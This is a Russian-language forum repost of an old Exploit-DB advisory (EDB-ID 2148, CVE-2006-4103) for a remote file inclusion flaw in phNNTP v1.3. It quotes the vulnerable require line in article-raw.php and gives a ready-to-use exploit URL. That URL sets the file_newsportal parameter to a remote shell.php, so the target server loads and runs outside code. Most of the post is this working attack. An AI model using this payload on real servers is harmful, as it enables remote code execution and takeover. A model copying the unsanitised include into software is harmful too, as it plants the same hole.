- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2148
- Проверка EDB
-
- Пройдено
- Автор
- DRAGO84
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4103
- Дата публикации
- 2006-08-08
Код:
phNNTP v1.3 Remote File Inclusion
CreW: ToxiC
Bug Found By Drago84
Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz
Problem Is:
require("$file_newsportal");
Page Affect:
article-raw.php
Path:
Declare file_newsportal
ExP:
http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?
Greatz: Str0ke
# milw0rm.com [2006-08-08]- Источник
- www.exploit-db.com
